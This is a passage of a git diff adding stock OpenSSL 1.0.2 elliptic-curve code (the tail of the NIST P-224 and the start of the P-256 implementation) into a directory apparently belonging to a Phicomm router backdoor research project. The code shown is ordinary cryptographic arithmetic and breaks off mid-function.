+    if (i > 0)
+        return;
+
+    OPENSSL_cleanse(pre, sizeof *pre);
+    OPENSSL_free(pre);
+}
+
+/******************************************************************************/
+/*
+ * OPENSSL EC_METHOD FUNCTIONS
+ */
+
+int ec_GFp_nistp224_group_init(EC_GROUP *group)
+{
+    int ret;
+    ret = ec_GFp_simple_group_init(group);
+    group->a_is_minus3 = 1;
+    return ret;
+}
+
+int ec_GFp_nistp224_group_set_curve(EC_GROUP *group, const BIGNUM *p,
+                                    const BIGNUM *a, const BIGNUM *b,
+                                    BN_CTX *ctx)
+{
+    int ret = 0;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *curve_p, *curve_a, *curve_b;
+
+    if (ctx == NULL)
+        if ((ctx = new_ctx = BN_CTX_new()) == NULL)
+            return 0;
+    BN_CTX_start(ctx);
+    if (((curve_p = BN_CTX_get(ctx)) == NULL) ||
+        ((curve_a = BN_CTX_get(ctx)) == NULL) ||
+        ((curve_b = BN_CTX_get(ctx)) == NULL))
+        goto err;
+    BN_bin2bn(nistp224_curve_params[0], sizeof(felem_bytearray), curve_p);
+    BN_bin2bn(nistp224_curve_params[1], sizeof(felem_bytearray), curve_a);
+    BN_bin2bn(nistp224_curve_params[2], sizeof(felem_bytearray), curve_b);
+    if ((BN_cmp(curve_p, p)) || (BN_cmp(curve_a, a)) || (BN_cmp(curve_b, b))) {
+        ECerr(EC_F_EC_GFP_NISTP224_GROUP_SET_CURVE,
+              EC_R_WRONG_CURVE_PARAMETERS);
+        goto err;
+    }
+    group->field_mod_func = BN_nist_mod_224;
+    ret = ec_GFp_simple_group_set_curve(group, p, a, b, ctx);
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+/*
+ * Takes the Jacobian coordinates (X, Y, Z) of a point and returns (X', Y') =
+ * (X/Z^2, Y/Z^3)
+ */
+int ec_GFp_nistp224_point_get_affine_coordinates(const EC_GROUP *group,
+                                                 const EC_POINT *point,
+                                                 BIGNUM *x, BIGNUM *y,
+                                                 BN_CTX *ctx)
+{
+    felem z1, z2, x_in, y_in, x_out, y_out;
+    widefelem tmp;
+
+    if (EC_POINT_is_at_infinity(group, point)) {
+        ECerr(EC_F_EC_GFP_NISTP224_POINT_GET_AFFINE_COORDINATES,
+              EC_R_POINT_AT_INFINITY);
+        return 0;
+    }
+    if ((!BN_to_felem(x_in, &point->X)) || (!BN_to_felem(y_in, &point->Y)) ||
+        (!BN_to_felem(z1, &point->Z)))
+        return 0;
+    felem_inv(z2, z1);
+    felem_square(tmp, z2);
+    felem_reduce(z1, tmp);
+    felem_mul(tmp, x_in, z1);
+    felem_reduce(x_in, tmp);
+    felem_contract(x_out, x_in);
+    if (x != NULL) {
+        if (!felem_to_BN(x, x_out)) {
+            ECerr(EC_F_EC_GFP_NISTP224_POINT_GET_AFFINE_COORDINATES,
+                  ERR_R_BN_LIB);
+            return 0;
+        }
+    }
+    felem_mul(tmp, z1, z2);
+    felem_reduce(z1, tmp);
+    felem_mul(tmp, y_in, z1);
+    felem_reduce(y_in, tmp);
+    felem_contract(y_out, y_in);
+    if (y != NULL) {
+        if (!felem_to_BN(y, y_out)) {
+            ECerr(EC_F_EC_GFP_NISTP224_POINT_GET_AFFINE_COORDINATES,
+                  ERR_R_BN_LIB);
+            return 0;
+        }
+    }
+    return 1;
+}
+
+static void make_points_affine(size_t num, felem points[ /* num */ ][3],
+                               felem tmp_felems[ /* num+1 */ ])
+{
+    /*
+     * Runs in constant time, unless an input is the point at infinity (which
+     * normally shouldn't happen).
+     */
+    ec_GFp_nistp_points_make_affine_internal(num,
+                                             points,
+                                             sizeof(felem),
+                                             tmp_felems,
+                                             (void (*)(void *))felem_one,
+                                             (int (*)(const void *))
+                                             felem_is_zero_int,
+                                             (void (*)(void *, const void *))
+                                             felem_assign,
+                                             (void (*)(void *, const void *))
+                                             felem_square_reduce, (void (*)
+                                                                   (void *,
+                                                                    const void
+                                                                    *,
+                                                                    const void
+                                                                    *))
+                                             felem_mul_reduce,
+                                             (void (*)(void *, const void *))
+                                             felem_inv,
+                                             (void (*)(void *, const void *))
+                                             felem_contract);
+}
+
+/*
+ * Computes scalar*generator + \sum scalars[i]*points[i], ignoring NULL
+ * values Result is stored in r (r can equal one of the inputs).
+ */
+int ec_GFp_nistp224_points_mul(const EC_GROUP *group, EC_POINT *r,
+                               const BIGNUM *scalar, size_t num,
+                               const EC_POINT *points[],
+                               const BIGNUM *scalars[], BN_CTX *ctx)
+{
+    int ret = 0;
+    int j;
+    unsigned i;
+    int mixed = 0;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *x, *y, *z, *tmp_scalar;
+    felem_bytearray g_secret;
+    felem_bytearray *secrets = NULL;
+    felem(*pre_comp)[17][3] = NULL;
+    felem *tmp_felems = NULL;
+    felem_bytearray tmp;
+    unsigned num_bytes;
+    int have_pre_comp = 0;
+    size_t num_points = num;
+    felem x_in, y_in, z_in, x_out, y_out, z_out;
+    NISTP224_PRE_COMP *pre = NULL;
+    const felem(*g_pre_comp)[16][3] = NULL;
+    EC_POINT *generator = NULL;
+    const EC_POINT *p = NULL;
+    const BIGNUM *p_scalar = NULL;
+
+    if (ctx == NULL)
+        if ((ctx = new_ctx = BN_CTX_new()) == NULL)
+            return 0;
+    BN_CTX_start(ctx);
+    if (((x = BN_CTX_get(ctx)) == NULL) ||
+        ((y = BN_CTX_get(ctx)) == NULL) ||
+        ((z = BN_CTX_get(ctx)) == NULL) ||
+        ((tmp_scalar = BN_CTX_get(ctx)) == NULL))
+        goto err;
+
+    if (scalar != NULL) {
+        pre = EC_EX_DATA_get_data(group->extra_data,
+                                  nistp224_pre_comp_dup,
+                                  nistp224_pre_comp_free,
+                                  nistp224_pre_comp_clear_free);
+        if (pre)
+            /* we have precomputation, try to use it */
+            g_pre_comp = (const felem(*)[16][3])pre->g_pre_comp;
+        else
+            /* try to use the standard precomputation */
+            g_pre_comp = &gmul[0];
+        generator = EC_POINT_new(group);
+        if (generator == NULL)
+            goto err;
+        /* get the generator from precomputation */
+        if (!felem_to_BN(x, g_pre_comp[0][1][0]) ||
+            !felem_to_BN(y, g_pre_comp[0][1][1]) ||
+            !felem_to_BN(z, g_pre_comp[0][1][2])) {
+            ECerr(EC_F_EC_GFP_NISTP224_POINTS_MUL, ERR_R_BN_LIB);
+            goto err;
+        }
+        if (!EC_POINT_set_Jprojective_coordinates_GFp(group,
+                                                      generator, x, y, z,
+                                                      ctx))
+            goto err;
+        if (0 == EC_POINT_cmp(group, generator, group->generator, ctx))
+            /* precomputation matches generator */
+            have_pre_comp = 1;
+        else
+            /*
+             * we don't have valid precomputation: treat the generator as a
+             * random point
+             */
+            num_points = num_points + 1;
+    }
+
+    if (num_points > 0) {
+        if (num_points >= 3) {
+            /*
+             * unless we precompute multiples for just one or two points,
+             * converting those into affine form is time well spent
+             */
+            mixed = 1;
+        }
+        secrets = OPENSSL_malloc(num_points * sizeof(felem_bytearray));
+        pre_comp = OPENSSL_malloc(num_points * 17 * 3 * sizeof(felem));
+        if (mixed)
+            tmp_felems =
+                OPENSSL_malloc((num_points * 17 + 1) * sizeof(felem));
+        if ((secrets == NULL) || (pre_comp == NULL)
+            || (mixed && (tmp_felems == NULL))) {
+            ECerr(EC_F_EC_GFP_NISTP224_POINTS_MUL, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        /*
+         * we treat NULL scalars as 0, and NULL points as points at infinity,
+         * i.e., they contribute nothing to the linear combination
+         */
+        memset(secrets, 0, num_points * sizeof(felem_bytearray));
+        memset(pre_comp, 0, num_points * 17 * 3 * sizeof(felem));
+        for (i = 0; i < num_points; ++i) {
+            if (i == num)
+                /* the generator */
+            {
+                p = EC_GROUP_get0_generator(group);
+                p_scalar = scalar;
+            } else
+                /* the i^th point */
+            {
+                p = points[i];
+                p_scalar = scalars[i];
+            }
+            if ((p_scalar != NULL) && (p != NULL)) {
+                /* reduce scalar to 0 <= scalar < 2^224 */
+                if ((BN_num_bits(p_scalar) > 224)
+                    || (BN_is_negative(p_scalar))) {
+                    /*
+                     * this is an unusual input, and we don't guarantee
+                     * constant-timeness
+                     */
+                    if (!BN_nnmod(tmp_scalar, p_scalar, &group->order, ctx)) {
+                        ECerr(EC_F_EC_GFP_NISTP224_POINTS_MUL, ERR_R_BN_LIB);
+                        goto err;
+                    }
+                    num_bytes = BN_bn2bin(tmp_scalar, tmp);
+                } else
+                    num_bytes = BN_bn2bin(p_scalar, tmp);
+                flip_endian(secrets[i], tmp, num_bytes);
+                /* precompute multiples */
+                if ((!BN_to_felem(x_out, &p->X)) ||
+                    (!BN_to_felem(y_out, &p->Y)) ||
+                    (!BN_to_felem(z_out, &p->Z)))
+                    goto err;
+                felem_assign(pre_comp[i][1][0], x_out);
+                felem_assign(pre_comp[i][1][1], y_out);
+                felem_assign(pre_comp[i][1][2], z_out);
+                for (j = 2; j <= 16; ++j) {
+                    if (j & 1) {
+                        point_add(pre_comp[i][j][0], pre_comp[i][j][1],
+                                  pre_comp[i][j][2], pre_comp[i][1][0],
+                                  pre_comp[i][1][1], pre_comp[i][1][2], 0,
+                                  pre_comp[i][j - 1][0],
+                                  pre_comp[i][j - 1][1],
+                                  pre_comp[i][j - 1][2]);
+                    } else {
+                        point_double(pre_comp[i][j][0], pre_comp[i][j][1],
+                                     pre_comp[i][j][2], pre_comp[i][j / 2][0],
+                                     pre_comp[i][j / 2][1],
+                                     pre_comp[i][j / 2][2]);
+                    }
+                }
+            }
+        }
+        if (mixed)
+            make_points_affine(num_points * 17, pre_comp[0], tmp_felems);
+    }
+
+    /* the scalar for the generator */
+    if ((scalar != NULL) && (have_pre_comp)) {
+        memset(g_secret, 0, sizeof g_secret);
+        /* reduce scalar to 0 <= scalar < 2^224 */
+        if ((BN_num_bits(scalar) > 224) || (BN_is_negative(scalar))) {
+            /*
+             * this is an unusual input, and we don't guarantee
+             * constant-timeness
+             */
+            if (!BN_nnmod(tmp_scalar, scalar, &group->order, ctx)) {
+                ECerr(EC_F_EC_GFP_NISTP224_POINTS_MUL, ERR_R_BN_LIB);
+                goto err;
+            }
+            num_bytes = BN_bn2bin(tmp_scalar, tmp);
+        } else
+            num_bytes = BN_bn2bin(scalar, tmp);
+        flip_endian(g_secret, tmp, num_bytes);
+        /* do the multiplication with generator precomputation */
+        batch_mul(x_out, y_out, z_out,
+                  (const felem_bytearray(*))secrets, num_points,
+                  g_secret,
+                  mixed, (const felem(*)[17][3])pre_comp, g_pre_comp);
+    } else
+        /* do the multiplication without generator precomputation */
+        batch_mul(x_out, y_out, z_out,
+                  (const felem_bytearray(*))secrets, num_points,
+                  NULL, mixed, (const felem(*)[17][3])pre_comp, NULL);
+    /* reduce the output to its unique minimal representation */
+    felem_contract(x_in, x_out);
+    felem_contract(y_in, y_out);
+    felem_contract(z_in, z_out);
+    if ((!felem_to_BN(x, x_in)) || (!felem_to_BN(y, y_in)) ||
+        (!felem_to_BN(z, z_in))) {
+        ECerr(EC_F_EC_GFP_NISTP224_POINTS_MUL, ERR_R_BN_LIB);
+        goto err;
+    }
+    ret = EC_POINT_set_Jprojective_coordinates_GFp(group, r, x, y, z, ctx);
+
+ err:
+    BN_CTX_end(ctx);
+    if (generator != NULL)
+        EC_POINT_free(generator);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    if (secrets != NULL)
+        OPENSSL_free(secrets);
+    if (pre_comp != NULL)
+        OPENSSL_free(pre_comp);
+    if (tmp_felems != NULL)
+        OPENSSL_free(tmp_felems);
+    return ret;
+}
+
+int ec_GFp_nistp224_precompute_mult(EC_GROUP *group, BN_CTX *ctx)
+{
+    int ret = 0;
+    NISTP224_PRE_COMP *pre = NULL;
+    int i, j;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *x, *y;
+    EC_POINT *generator = NULL;
+    felem tmp_felems[32];
+
+    /* throw away old precomputation */
+    EC_EX_DATA_free_data(&group->extra_data, nistp224_pre_comp_dup,
+                         nistp224_pre_comp_free,
+                         nistp224_pre_comp_clear_free);
+    if (ctx == NULL)
+        if ((ctx = new_ctx = BN_CTX_new()) == NULL)
+            return 0;
+    BN_CTX_start(ctx);
+    if (((x = BN_CTX_get(ctx)) == NULL) || ((y = BN_CTX_get(ctx)) == NULL))
+        goto err;
+    /* get the generator */
+    if (group->generator == NULL)
+        goto err;
+    generator = EC_POINT_new(group);
+    if (generator == NULL)
+        goto err;
+    BN_bin2bn(nistp224_curve_params[3], sizeof(felem_bytearray), x);
+    BN_bin2bn(nistp224_curve_params[4], sizeof(felem_bytearray), y);
+    if (!EC_POINT_set_affine_coordinates_GFp(group, generator, x, y, ctx))
+        goto err;
+    if ((pre = nistp224_pre_comp_new()) == NULL)
+        goto err;
+    /*
+     * if the generator is the standard one, use built-in precomputation
+     */
+    if (0 == EC_POINT_cmp(group, generator, group->generator, ctx)) {
+        memcpy(pre->g_pre_comp, gmul, sizeof(pre->g_pre_comp));
+        ret = 1;
+        goto err;
+    }
+    if ((!BN_to_felem(pre->g_pre_comp[0][1][0], &group->generator->X)) ||
+        (!BN_to_felem(pre->g_pre_comp[0][1][1], &group->generator->Y)) ||
+        (!BN_to_felem(pre->g_pre_comp[0][1][2], &group->generator->Z)))
+        goto err;
+    /*
+     * compute 2^56*G, 2^112*G, 2^168*G for the first table, 2^28*G, 2^84*G,
+     * 2^140*G, 2^196*G for the second one
+     */
+    for (i = 1; i <= 8; i <<= 1) {
+        point_double(pre->g_pre_comp[1][i][0], pre->g_pre_comp[1][i][1],
+                     pre->g_pre_comp[1][i][2], pre->g_pre_comp[0][i][0],
+                     pre->g_pre_comp[0][i][1], pre->g_pre_comp[0][i][2]);
+        for (j = 0; j < 27; ++j) {
+            point_double(pre->g_pre_comp[1][i][0], pre->g_pre_comp[1][i][1],
+                         pre->g_pre_comp[1][i][2], pre->g_pre_comp[1][i][0],
+                         pre->g_pre_comp[1][i][1], pre->g_pre_comp[1][i][2]);
+        }
+        if (i == 8)
+            break;
+        point_double(pre->g_pre_comp[0][2 * i][0],
+                     pre->g_pre_comp[0][2 * i][1],
+                     pre->g_pre_comp[0][2 * i][2], pre->g_pre_comp[1][i][0],
+                     pre->g_pre_comp[1][i][1], pre->g_pre_comp[1][i][2]);
+        for (j = 0; j < 27; ++j) {
+            point_double(pre->g_pre_comp[0][2 * i][0],
+                         pre->g_pre_comp[0][2 * i][1],
+                         pre->g_pre_comp[0][2 * i][2],
+                         pre->g_pre_comp[0][2 * i][0],
+                         pre->g_pre_comp[0][2 * i][1],
+                         pre->g_pre_comp[0][2 * i][2]);
+        }
+    }
+    for (i = 0; i < 2; i++) {
+        /* g_pre_comp[i][0] is the point at infinity */
+        memset(pre->g_pre_comp[i][0], 0, sizeof(pre->g_pre_comp[i][0]));
+        /* the remaining multiples */
+        /* 2^56*G + 2^112*G resp. 2^84*G + 2^140*G */
+        point_add(pre->g_pre_comp[i][6][0], pre->g_pre_comp[i][6][1],
+                  pre->g_pre_comp[i][6][2], pre->g_pre_comp[i][4][0],
+                  pre->g_pre_comp[i][4][1], pre->g_pre_comp[i][4][2],
+                  0, pre->g_pre_comp[i][2][0], pre->g_pre_comp[i][2][1],
+                  pre->g_pre_comp[i][2][2]);
+        /* 2^56*G + 2^168*G resp. 2^84*G + 2^196*G */
+        point_add(pre->g_pre_comp[i][10][0], pre->g_pre_comp[i][10][1],
+                  pre->g_pre_comp[i][10][2], pre->g_pre_comp[i][8][0],
+                  pre->g_pre_comp[i][8][1], pre->g_pre_comp[i][8][2],
+                  0, pre->g_pre_comp[i][2][0], pre->g_pre_comp[i][2][1],
+                  pre->g_pre_comp[i][2][2]);
+        /* 2^112*G + 2^168*G resp. 2^140*G + 2^196*G */
+        point_add(pre->g_pre_comp[i][12][0], pre->g_pre_comp[i][12][1],
+                  pre->g_pre_comp[i][12][2], pre->g_pre_comp[i][8][0],
+                  pre->g_pre_comp[i][8][1], pre->g_pre_comp[i][8][2],
+                  0, pre->g_pre_comp[i][4][0], pre->g_pre_comp[i][4][1],
+                  pre->g_pre_comp[i][4][2]);
+        /*
+         * 2^56*G + 2^112*G + 2^168*G resp. 2^84*G + 2^140*G + 2^196*G
+         */
+        point_add(pre->g_pre_comp[i][14][0], pre->g_pre_comp[i][14][1],
+                  pre->g_pre_comp[i][14][2], pre->g_pre_comp[i][12][0],
+                  pre->g_pre_comp[i][12][1], pre->g_pre_comp[i][12][2],
+                  0, pre->g_pre_comp[i][2][0], pre->g_pre_comp[i][2][1],
+                  pre->g_pre_comp[i][2][2]);
+        for (j = 1; j < 8; ++j) {
+            /* odd multiples: add G resp. 2^28*G */
+            point_add(pre->g_pre_comp[i][2 * j + 1][0],
+                      pre->g_pre_comp[i][2 * j + 1][1],
+                      pre->g_pre_comp[i][2 * j + 1][2],
+                      pre->g_pre_comp[i][2 * j][0],
+                      pre->g_pre_comp[i][2 * j][1],
+                      pre->g_pre_comp[i][2 * j][2], 0,
+                      pre->g_pre_comp[i][1][0], pre->g_pre_comp[i][1][1],
+                      pre->g_pre_comp[i][1][2]);
+        }
+    }
+    make_points_affine(31, &(pre->g_pre_comp[0][1]), tmp_felems);
+
+    if (!EC_EX_DATA_set_data(&group->extra_data, pre, nistp224_pre_comp_dup,
+                             nistp224_pre_comp_free,
+                             nistp224_pre_comp_clear_free))
+        goto err;
+    ret = 1;
+    pre = NULL;
+ err:
+    BN_CTX_end(ctx);
+    if (generator != NULL)
+        EC_POINT_free(generator);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    if (pre)
+        nistp224_pre_comp_free(pre);
+    return ret;
+}
+
+int ec_GFp_nistp224_have_precompute_mult(const EC_GROUP *group)
+{
+    if (EC_EX_DATA_get_data(group->extra_data, nistp224_pre_comp_dup,
+                            nistp224_pre_comp_free,
+                            nistp224_pre_comp_clear_free)
+        != NULL)
+        return 1;
+    else
+        return 0;
+}
+
+#else
+static void *dummy = &dummy;
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistp256.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistp256.c
new file mode 100644
index 0000000..a588708
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistp256.c
@@ -0,0 +1,2369 @@
+/* crypto/ec/ecp_nistp256.c */
+/*
+ * Written by Adam Langley (Google) for the OpenSSL project
+ */
+/* Copyright 2011 Google Inc.
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ *
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ *  Unless required by applicable law or agreed to in writing, software
+ *  distributed under the License is distributed on an "AS IS" BASIS,
+ *  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ *  See the License for the specific language governing permissions and
+ *  limitations under the License.
+ */
+
+/*
+ * A 64-bit implementation of the NIST P-256 elliptic curve point multiplication
+ *
+ * OpenSSL integration was taken from Emilia Kasper's work in ecp_nistp224.c.
+ * Otherwise based on Emilia's P224 work, which was inspired by my curve25519
+ * work which got its smarts from Daniel J. Bernstein's work on the same.
+ */
+
+#include <openssl/opensslconf.h>
+#ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
+
+# ifndef OPENSSL_SYS_VMS
+#  include <stdint.h>
+# else
+#  include <inttypes.h>
+# endif
+
+# include <string.h>
+# include <openssl/err.h>
+# include "ec_lcl.h"
+
+# if defined(__GNUC__) && (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 1))
+  /* even with gcc, the typedef won't work for 32-bit platforms */
+typedef __uint128_t uint128_t;  /* nonstandard; implemented by gcc on 64-bit
+                                 * platforms */
+typedef __int128_t int128_t;
+# else
+#  error "Need GCC 3.1 or later to define type uint128_t"
+# endif
+
+typedef uint8_t u8;
+typedef uint32_t u32;
+typedef uint64_t u64;
+typedef int64_t s64;
+
+/*
+ * The underlying field. P256 operates over GF(2^256-2^224+2^192+2^96-1). We
+ * can serialise an element of this field into 32 bytes. We call this an
+ * felem_bytearray.
+ */
+
+typedef u8 felem_bytearray[32];
+
+/*
+ * These are the parameters of P256, taken from FIPS 186-3, page 86. These
+ * values are big-endian.
+ */
+static const felem_bytearray nistp256_curve_params[5] = {
+    {0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x01, /* p */
+     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+     0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
+    {0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x01, /* a = -3 */
+     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+     0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc}, /* b */
+    {0x5a, 0xc6, 0x35, 0xd8, 0xaa, 0x3a, 0x93, 0xe7,
+     0xb3, 0xeb, 0xbd, 0x55, 0x76, 0x98, 0x86, 0xbc,
+     0x65, 0x1d, 0x06, 0xb0, 0xcc, 0x53, 0xb0, 0xf6,
+     0x3b, 0xce, 0x3c, 0x3e, 0x27, 0xd2, 0x60, 0x4b},
+    {0x6b, 0x17, 0xd1, 0xf2, 0xe1, 0x2c, 0x42, 0x47, /* x */
+     0xf8, 0xbc, 0xe6, 0xe5, 0x63, 0xa4, 0x40, 0xf2,
+     0x77, 0x03, 0x7d, 0x81, 0x2d, 0xeb, 0x33, 0xa0,
+     0xf4, 0xa1, 0x39, 0x45, 0xd8, 0x98, 0xc2, 0x96},
+    {0x4f, 0xe3, 0x42, 0xe2, 0xfe, 0x1a, 0x7f, 0x9b, /* y */
+     0x8e, 0xe7, 0xeb, 0x4a, 0x7c, 0x0f, 0x9e, 0x16,
+     0x2b, 0xce, 0x33, 0x57, 0x6b, 0x31, 0x5e, 0xce,
+     0xcb, 0xb6, 0x40, 0x68, 0x37, 0xbf, 0x51, 0xf5}
+};
+
+/*-
+ * The representation of field elements.
+ * ------------------------------------
+ *
+ * We represent field elements with either four 128-bit values, eight 128-bit
+ * values, or four 64-bit values. The field element represented is:
+ *   v[0]*2^0 + v[1]*2^64 + v[2]*2^128 + v[3]*2^192  (mod p)
+ * or:
+ *   v[0]*2^0 + v[1]*2^64 + v[2]*2^128 + ... + v[8]*2^512  (mod p)
+ *
+ * 128-bit values are called 'limbs'. Since the limbs are spaced only 64 bits
+ * apart, but are 128-bits wide, the most significant bits of each limb overlap
+ * with the least significant bits of the next.
+ *
+ * A field element with four limbs is an 'felem'. One with eight limbs is a
+ * 'longfelem'
+ *
+ * A field element with four, 64-bit values is called a 'smallfelem'. Small
+ * values are used as intermediate values before multiplication.
+ */
+
+# define NLIMBS 4
+
+typedef uint128_t limb;
+typedef limb felem[NLIMBS];
+typedef limb longfelem[NLIMBS * 2];
+typedef u64 smallfelem[NLIMBS];
+
+/* This is the value of the prime as four 64-bit words, little-endian. */
+static const u64 kPrime[4] =
+    { 0xfffffffffffffffful, 0xffffffff, 0, 0xffffffff00000001ul };
+static const u64 bottom63bits = 0x7ffffffffffffffful;
+
+/*
+ * bin32_to_felem takes a little-endian byte array and converts it into felem
+ * form. This assumes that the CPU is little-endian.
+ */
+static void bin32_to_felem(felem out, const u8 in[32])
+{
+    out[0] = *((u64 *)&in[0]);
+    out[1] = *((u64 *)&in[8]);
+    out[2] = *((u64 *)&in[16]);
+    out[3] = *((u64 *)&in[24]);
+}
+
+/*
+ * smallfelem_to_bin32 takes a smallfelem and serialises into a little
+ * endian, 32 byte array. This assumes that the CPU is little-endian.
+ */
+static void smallfelem_to_bin32(u8 out[32], const smallfelem in)
+{
+    *((u64 *)&out[0]) = in[0];
+    *((u64 *)&out[8]) = in[1];
+    *((u64 *)&out[16]) = in[2];
+    *((u64 *)&out[24]) = in[3];
+}
+
+/* To preserve endianness when using BN_bn2bin and BN_bin2bn */
+static void flip_endian(u8 *out, const u8 *in, unsigned len)
+{
+    unsigned i;
+    for (i = 0; i < len; ++i)
+        out[i] = in[len - 1 - i];
+}
+
+/* BN_to_felem converts an OpenSSL BIGNUM into an felem */
+static int BN_to_felem(felem out, const BIGNUM *bn)
+{
+    felem_bytearray b_in;
+    felem_bytearray b_out;
+    unsigned num_bytes;
+
+    /* BN_bn2bin eats leading zeroes */
+    memset(b_out, 0, sizeof b_out);
+    num_bytes = BN_num_bytes(bn);
+    if (num_bytes > sizeof b_out) {
+        ECerr(EC_F_BN_TO_FELEM, EC_R_BIGNUM_OUT_OF_RANGE);
+        return 0;
+    }
+    if (BN_is_negative(bn)) {
+        ECerr(EC_F_BN_TO_FELEM, EC_R_BIGNUM_OUT_OF_RANGE);
+        return 0;
+    }
+    num_bytes = BN_bn2bin(bn, b_in);
+    flip_endian(b_out, b_in, num_bytes);
+    bin32_to_felem(out, b_out);
+    return 1;
+}
+
+/* felem_to_BN converts an felem into an OpenSSL BIGNUM */
+static BIGNUM *smallfelem_to_BN(BIGNUM *out, const smallfelem in)
+{
+    felem_bytearray b_in, b_out;
+    smallfelem_to_bin32(b_in, in);
+    flip_endian(b_out, b_in, sizeof b_out);
+    return BN_bin2bn(b_out, sizeof b_out, out);
+}
+
+/*-
+ * Field operations
+ * ----------------
+ */
+
+static void smallfelem_one(smallfelem out)
+{
+    out[0] = 1;
+    out[1] = 0;
+    out[2] = 0;
+    out[3] = 0;
+}
+
+static void smallfelem_assign(smallfelem out, const smallfelem in)
+{
+    out[0] = in[0];
+    out[1] = in[1];
+    out[2] = in[2];
+    out[3] = in[3];
+}
+
+static void felem_assign(felem out, const felem in)
+{
+    out[0] = in[0];
+    out[1] = in[1];
+    out[2] = in[2];
+    out[3] = in[3];
+}
+
+/* felem_sum sets out = out + in. */
+static void felem_sum(felem out, const felem in)
+{
+    out[0] += in[0];
+    out[1] += in[1];
+    out[2] += in[2];
+    out[3] += in[3];
+}
+
+/* felem_small_sum sets out = out + in. */
+static void felem_small_sum(felem out, const smallfelem in)
+{
+    out[0] += in[0];
+    out[1] += in[1];
+    out[2] += in[2];
+    out[3] += in[3];
+}
+
+/* felem_scalar sets out = out * scalar */
+static void felem_scalar(felem out, const u64 scalar)
+{
+    out[0] *= scalar;
+    out[1] *= scalar;
+    out[2] *= scalar;
+    out[3] *= scalar;
+}
+
+/* longfelem_scalar sets out = out * scalar */
+static void longfelem_scalar(longfelem out, const u64 scalar)
+{
+    out[0] *= scalar;
+    out[1] *= scalar;
+    out[2] *= scalar;
+    out[3] *= scalar;
+    out[4] *= scalar;
+    out[5] *= scalar;
+    out[6] *= scalar;
+    out[7] *= scalar;
+}
+
+# define two105m41m9 (((limb)1) << 105) - (((limb)1) << 41) - (((limb)1) << 9)
+# define two105 (((limb)1) << 105)
+# define two105m41p9 (((limb)1) << 105) - (((limb)1) << 41) + (((limb)1) << 9)
+
+/* zero105 is 0 mod p */
+static const felem zero105 =
+    { two105m41m9, two105, two105m41p9, two105m41p9 };
+
+/*-
+ * smallfelem_neg sets |out| to |-small|
+ * On exit:
+ *   out[i] < out[i] + 2^105
+ */
+static void smallfelem_neg(felem out, const smallfelem small)
+{
+    /* In order to prevent underflow, we subtract from 0 mod p. */
+    out[0] = zero105[0] - small[0];
+    out[1] = zero105[1] - small[1];
+    out[2] = zero105[2] - small[2];
+    out[3] = zero105[3] - small[3];
+}
+
+/*-
+ * felem_diff subtracts |in| from |out|
+ * On entry:
+ *   in[i] < 2^104
+ * On exit:
+ *   out[i] < out[i] + 2^105
+ */
+static void felem_diff(felem out, const felem in)
+{
+    /*
+     * In order to prevent underflow, we add 0 mod p before subtracting.
+     */
+    out[0] += zero105[0];
+    out[1] += zero105[1];
+    out[2] += zero105[2];
+    out[3] += zero105[3];
+
+    out[0] -= in[0];
+    out[1] -= in[1];
+    out[2] -= in[2];
+    out[3] -= in[3];
+}
+
+# define two107m43m11 (((limb)1) << 107) - (((limb)1) << 43) - (((limb)1) << 11)
+# define two107 (((limb)1) << 107)
+# define two107m43p11 (((limb)1) << 107) - (((limb)1) << 43) + (((limb)1) << 11)
+
+/* zero107 is 0 mod p */
+static const felem zero107 =
+    { two107m43m11, two107, two107m43p11, two107m43p11 };
+
+/*-
+ * An alternative felem_diff for larger inputs |in|
+ * felem_diff_zero107 subtracts |in| from |out|
+ * On entry:
+ *   in[i] < 2^106
+ * On exit:
+ *   out[i] < out[i] + 2^107
+ */
+static void felem_diff_zero107(felem out, const felem in)
+{
+    /*
+     * In order to prevent underflow, we add 0 mod p before subtracting.
+     */
+    out[0] += zero107[0];
+    out[1] += zero107[1];
+    out[2] += zero107[2];
+    out[3] += zero107[3];
+
+    out[0] -= in[0];
+    out[1] -= in[1];
+    out[2] -= in[2];
+    out[3] -= in[3];
+}
+
+/*-
+ * longfelem_diff subtracts |in| from |out|
+ * On entry:
+ *   in[i] < 7*2^67
+ * On exit:
+ *   out[i] < out[i] + 2^70 + 2^40
+ */
+static void longfelem_diff(longfelem out, const longfelem in)
+{
+    static const limb two70m8p6 =
+        (((limb) 1) << 70) - (((limb) 1) << 8) + (((limb) 1) << 6);
+    static const limb two70p40 = (((limb) 1) << 70) + (((limb) 1) << 40);
+    static const limb two70 = (((limb) 1) << 70);
+    static const limb two70m40m38p6 =
+        (((limb) 1) << 70) - (((limb) 1) << 40) - (((limb) 1) << 38) +
+        (((limb) 1) << 6);
+    static const limb two70m6 = (((limb) 1) << 70) - (((limb) 1) << 6);
+
